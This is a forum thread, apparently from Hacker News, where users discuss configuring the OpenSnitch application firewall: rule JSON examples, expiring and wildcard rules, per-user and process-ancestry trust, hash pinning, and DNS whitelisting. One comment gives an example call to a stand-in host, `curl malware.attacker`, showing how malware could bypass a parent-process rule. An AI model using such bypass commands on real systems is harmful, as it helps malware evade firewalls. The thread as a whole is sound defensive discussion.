I've tried to use it extensively (as an interactive firewall). However, there are some problems (not the fault of OpenSnitch) that I'm not sure are even solvable.
For example, suppose I run `curl` in the terminal. I can either decide on a case-by-case basis to allow it through every time, or whitelist it permanently. Once I've whitelisted generic tools like `curl` or `wget`, the floodgates are really open, since any malware that has compromised my machine can just use `curl` or `wget` to reach the internet without hitting the firewall.
I’ve found that by using subdomain wildcards and/or subnets, I build up a stable set of rules pretty quickly and then only have to review requests to new endpoints once in a while.
To me, the peace of mind knowing that I’ll be prompted to allow new access is worth the initial hassle. And once the habit is built, it’s pretty easy to manage.
Editing to add: I also use expiring rules regularly. Maybe I trust an installer and want to let it do its thing. So I open it up with a rule for the executable that expires in the near future (options include forever, until reboot, the next 30s, the next 5 mins, etc.). This can drastically simplify some tasks when there happen to be a large number of endpoints, and it avoids leaving a hole open permanently.
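For the curious, this is roughly the shape of such a rule once saved. I'm going from memory of the JSON rule format, so verify against your version; the installer path is a placeholder, and I believe the temporary rules live in memory rather than on disk, but the shape is the same:

```
# Persistent rules live in /etc/opensnitchd/rules/ (writing there needs root).
cat > /etc/opensnitchd/rules/allow-installer-5m.json <<'EOF'
{
  "name": "allow-installer-5m",
  "enabled": true,
  "action": "allow",
  "duration": "5m",
  "operator": {
    "type": "simple",
    "operand": "process.path",
    "data": "/usr/bin/some-installer"
  }
}
EOF
```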
IMO it requires a ton of work. Adoption means updating rules quite often.
Sounds like that varies widely by person/use case. I’ve been using this software for a couple years at this point. I don’t have to update rules all that often (usually a few rules/week), and when I do, it’s usually a 10-30 second detour. The only time it takes more work is if I don’t know why something is trying to connect. But that’s exactly the scenario I’m targeting, i.e. calling attention to the weird looking connections.
My use cases are general productivity, development on side projects and a variety of software experiments, gaming, and some local AI stuff.
I also don’t see this as a ton of work. Rules are 99% pre-configured for you and all you have to do is choose the scope and duration of the rule and whether to reject or allow.
I’ll admit it’s annoying once in a while if there’s a major update to software that spawns a bunch of new rules, but once I get past the feeling of being annoyed, it’s really an extremely simple and quick process.
Really have to emphasize the habit creation part. After I stuck with it for a few weeks, it became second nature and I stopped getting annoyed for the most part. I consider this a worthwhile habit to build if you’re trying lots of code/libraries and want to know what’s phoning where.
Genuinely curious: how/why does that seem too often? I truly don’t understand. Have you seen the user experience and what’s involved?
How do you feel about other common permission prompts, e.g. location, microphone, camera, share your screen, run as privileged user, etc? I appreciate being asked about those things and I put this in a similar category.
I don't mind configuring things, my dotfiles are the product of 25 years of tweaking. But having to tweak anything multiple times per day is not going to help me work, it is going to hinder my work.
I highly recommend you look at the UX before drawing any conclusions in that case, because what you’re describing does not resemble the OpenSnitch UX.
The experience is much closer to the other common permission prompts I mentioned which is why I asked how you feel about them.
As a fellow multi-decade dotfile tweaker, that experience isn’t comparable and is not a good model for judging this tool.
OK, thanks, I'll give it a shot then. Thank you for insisting ))
Worth a shot! The first few days are by far the worst while all of the existing connections are accounted for, but things calm down quickly.
One thing I wished I knew sooner was that the square [+] button on the rule dialog opens more fields on the form for editing.
This makes it super easy to create a single wildcard rule e.g. when timesyncd tries to hit an ntp server for the first time, I expand the autogenerated rule that pops up to include all subdomains like *.ntp.domain.tld so I don’t have to keep creating rules for the other ntp servers. I’ve gotten more efficient over time this way.
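Concretely, the expanded rule ends up as a regexp on the destination host, something along these lines (the domain is a placeholder, and again I'm going from memory of the rule format):

```
# The doubled backslashes are JSON escaping for the regexp.
cat > /etc/opensnitchd/rules/allow-timesyncd-ntp.json <<'EOF'
{
  "name": "allow-timesyncd-ntp",
  "enabled": true,
  "action": "allow",
  "duration": "always",
  "operator": {
    "type": "regexp",
    "operand": "dest.host",
    "data": ".*\\.ntp\\.domain\\.tld"
  }
}
EOF
```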
Great, thanks, noted.
A few rules per week sounds like a lot. I think I am not paranoid enough to micromanage my connections like this.
Generally I don't get many prompts day to day, if I do it's because something has changed or I'm using a new application and I find it comforting to know what's going on.
You can make rules based on host, process arguments, etc so it's pretty flexible for allowing stuff you consider safe and staying out the way.
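For example, here's a rule keyed on the command line rather than just the binary, assuming I'm remembering the `process.command` operand right (the host is a placeholder):

```
# Allow curl only when it's talking to the one host we trust.
cat > /etc/opensnitchd/rules/allow-curl-api.json <<'EOF'
{
  "name": "allow-curl-api",
  "enabled": true,
  "action": "allow",
  "duration": "always",
  "operator": {
    "type": "regexp",
    "operand": "process.command",
    "data": ".*curl .*api\\.example\\.com.*"
  }
}
EOF
```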
Long ago I used ZoneAlarm on Windows, and this has a pretty similar UX to that.
I still use firejail or docker for anything that might be sketchy, but it's been super interesting seeing what trusted applications are doing. For example I was a bit shocked that the gnome calculator app was making network requests but it turned out it was for currency exchange rates.
In terms of time spent, that amounts to about one minute per week for me right now. Sometimes less.
The user experience is streamlined, and adding rules involves responding to a dialog that automatically pops up when a connection is attempted. UX is key here and this would be a very different story if you had to go into a separate rule management interface every time.
Regarding paranoia, I don’t see it that way. Supply chain attacks are alive and well, and if you’re running other people’s code on a regular basis, this is a low cost precautionary measure. I totally recognize that not everyone has the same risk profile or tolerance.
I have found it makes me less paranoid, which is good.
Having used it for a while, I have only found a few pieces of software trying to access places I don't expect and don't approve of (quite a few more that I do expect, but don't approve of). And none of them seemed actively malicious, just misbehaved or poorly configured.
I wonder if there's a way to configure it so that when the parent cmd is a trusted command (say, a bash/zsh owned by the user), it could let the curl command through and otherwise block it. But yeah, that seems like a bit of a hassle.
Then any process can do `system("bash -c 'curl malware.attacker'")`
The bash command line wouldn't be the same as the one launched by your terminal, though. But yes, I’m sure there are myriad exploits around something like that.
What could work instead is something where you run a command like `opensnitch-context dev` and it would talk to the running daemon to do proper authentication ("do you want to allow this context to be used?") and then hopefully some other magic (cgroups?) to know if the processes are part of that context even if they are sparse/nested child processes.
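A very rough sketch of the idea, using systemd scopes as the cgroup mechanism (everything here, including the `dev-context` name, is hypothetical):

```
# Start a shell inside a named scope; every descendant, however deeply
# nested, stays in that cgroup, visible in /proc/<pid>/cgroup.
systemd-run --user --scope --unit=dev-context bash

# What the daemon could then check for the PID behind a new connection:
pid=12345                                  # placeholder PID
if grep -q 'dev-context' "/proc/$pid/cgroup"; then
  echo "PID $pid belongs to the dev context"
fi
```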
You'd need a firewall that is not just TCP/UDP-aware, but HTTP(S)-aware, and a way for your firewall to sniff on TLS-encrypted traffic.
Or be ok with filtering HTTP/TLS traffic based on the domain only, as that part isn't encrypted (the SNI [Server Name Indication]). OpenSnitch should be able to allow/disallow based on that, rather than having to decrypt the TLS part.
Unless it’s using Encrypted SNI.
https://www.cloudflare.com/en-gb/learning/ssl/what-is-encryp...
Or, also, not using SNI at all.
But still, you can probably correlate DNS requests with connections to IP addresses in many cases. Although if the program uses DNS over HTTPS (DoH), as several programs do now, then the DNS lookup isn't visible either.
The solution that worked for me was to switch to Qubes OS, where everything runs in VMs with strong hardware-assisted isolation.
I switched from Qubes OS to Fedora+Flatpak+OpenSnitch. I couldn't get Wayland running on my hybrid-GPU (Nvidia) system. Qubes OS also drained the battery very quickly, and since graphics are (AFAIK) software-rendered, I ran into problems watching HD video (e.g. lots of dropped frames on YouTube).
Yes, this is accurate (for security reasons). However, you still shouldn't have serious problems with YouTube: https://forum.qubes-os.org/t/hd-video-playback-on-qubes-os-o... (see also the next few posts).
How to fix it if you do have problems: https://forum.qubes-os.org/t/improve-video-playback-performa...
Why did you need Wayland on Qubes?
It doesn’t pin to PID? What if I rename a program to something that has been whitelisted?
That's a valid question. It should allow/disallow executables by hashing the executable file (not even just the device ID + inode), not by comparing paths. Pinning the PID isn't good either, since PIDs are temporary.
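A sketch of what that check amounts to: hash the binary actually backing the process via `/proc/<pid>/exe`, so a renamed or swapped file on disk can't impersonate the whitelisted one. (I believe recent OpenSnitch releases added a checksum-match option, but I haven't verified that.)

```
pid=12345                           # placeholder: PID behind the connection
expected="<whitelisted sha256>"     # placeholder hash
actual=$(sha256sum "/proc/$pid/exe" | cut -d' ' -f1)
[ "$actual" = "$expected" ] && echo "binary matches the whitelisted hash"
```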
Including the path? If you can do that, there are bigger problems than the outgoing network communications.
Might be the same, but what if you allow all curl/wget traffic for the 'dev' user, and continue to flag any traffic for the 'normal' user?
For dev work, run `su -c 'curl …' dev`.
But if a malicious program is running as the normal user, then the app firewall flags its curl and wget use appropriately.
It would be annoying to input a password every time, so maybe set up PAM to use a YubiKey or biometrics? Also make sure this user cannot log in and does not have a password.
The dev user might be the one you want to protect best, in order to detect supply chain issues.
A sudo-like wrapper for this could be pretty cool.
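Something like this, maybe (all names made up; assumes the `dev` account exists with no password or login shell, plus a sudoers entry for it):

```
#!/bin/sh
# /usr/local/bin/devrun -- hypothetical sudo-like wrapper around the "dev" account.
# One-time setup (as root):
#   useradd --system --shell /usr/sbin/nologin dev
#   echo 'youruser ALL=(dev) NOPASSWD: ALL' > /etc/sudoers.d/devrun
exec sudo -u dev -- "$@"
```

Then `devrun curl https://example.com` runs curl as `dev`, and the firewall rules can key off that user.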
It will still capture processes unexpectedly trying to connect to the network for the first time, and there is some value in that, even if the popups aren't great.
I'm early in my Linux journey. Would it be a good approach to symlink bash to some new name, say, snitch, then whitelist that and run commands through it? Is there a better way without writing code?
Those problems are solvable. Some "big" EDRs, which happen to work in a similar way, let you declare parent/child relationships for the executables to block: i.e., it's possible to declare that if `curl` is spawned and, walking up the parent list, we encounter a process called `/usr/bin/trusted`, then this `curl` invocation is allowed. That would allow running `curl` from bash scripts, as long as the script has `/usr/bin/trusted` as an ancestor.
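The ancestry walk itself is straightforward; a rough sketch (with `/usr/bin/trusted` as the hypothetical anchor from above):

```
# Walk up the process tree from a PID, looking for the trusted ancestor.
pid=$$                                        # placeholder: PID of the curl process
while [ "$pid" -gt 1 ]; do
  if [ "$(readlink -f "/proc/$pid/exe")" = "/usr/bin/trusted" ]; then
    echo "trusted ancestor found: allow"
    break
  fi
  pid=$(ps -o ppid= -p "$pid" | tr -d ' ')    # next parent up
  [ -n "$pid" ] || break                      # parent vanished mid-walk
done
```

One caveat: parents can exit and children get reparented to PID 1 mid-walk, so doing this reliably really wants to happen in the kernel, which is presumably where those EDRs do it.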
so don't do that. problem solved
I wish OpenSnitch had a temporary allow feature for things like:
- allow a specific parent structure, e.g. when the python interpreter is invoked by a different parent command
- allow a specific process ID temporarily until the process is killed (with the option to allow or disallow its child processes)
- allow a specific target port range for games, and not only a specific port in the rulesets.
...because I feel that 99% of the annoying dialogues could have been avoided with this.
Is the filter configured per user, or is it system-wide? I know you can filter per user with iptables and whatever the newer one is (nftables), but I haven't dug that deep into OpenSnitch. Maybe a single trusted user account without a login that you could su into? I wonder if you could also whitelist a VM process and spin up single-use VM sandboxes for when you want to do a bunch of work like that.
Definitely a minor hassle to set up compared to just saying yes or no to permissions, but it's not complicated, if it works.
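For the iptables half at least, the owner match does the per-user split (`dev` is the placeholder trusted account; nftables spells it `meta skuid`). OpenSnitch itself runs as a system-wide daemon, but I believe its rules can match on the user ID too.

```
# Let the dedicated account's traffic out unconditionally; everything else
# still goes through the normal interactive prompting.
iptables -A OUTPUT -m owner --uid-owner dev -j ACCEPT
```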
You can install an unrestricted version under a new name and alias wget and curl to it in interactive shells.
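Something like this, roughly (`icurl` is an arbitrary name):

```
# Whitelist ~/bin/icurl in the firewall and keep prompting on /usr/bin/curl;
# the alias only takes effect in interactive shells.
mkdir -p ~/bin
cp "$(command -v curl)" ~/bin/icurl
echo "alias curl='$HOME/bin/icurl'" >> ~/.bashrc
```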
This sounds rather silly. If this is really a concern, then "curl" or "wget" can be renamed. I use an application-level firewall on mobile, and I do not "whitelist" names of programs; I "whitelist" access to certain domain names/IP addresses by certain programs.
The easiest way to stop programs/malware from phoning home IME is to deny access to DNS. I have been doing this for decades and it still works flawlessly. "99%" of the time programs/malware that phone home rely on DNS, not "hard-coded" IP addresses. And it is quite easy for me to detect the rare case of a program/malware that does not need DNS.
With DNS I "whitelist" certain domain names. In fact, today I do not even use a locally-served zone file with the IP addresses I need (the whitelist); a forward proxy handles the domain-to-IP mapping, and the whitelist the proxy loads is a text file, like a zone file but simpler.
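For anyone who wants the basic shape of this, here's a sketch with dnsmasq standing in for my proxy. The domain and upstream are placeholders, and the nft lines assume an existing inet/filter table with an output chain:

```
# Only the local resolver may speak DNS upstream; drop port 53 for everyone else.
nft add rule inet filter output meta skuid "dnsmasq" udp dport 53 accept
nft add rule inet filter output udp dport 53 drop
nft add rule inet filter output tcp dport 53 drop

# /etc/dnsmasq.d/whitelist.conf -- forward only whitelisted names, NXDOMAIN the rest:
#   server=/allowed.example.com/9.9.9.9
#   address=/#/
```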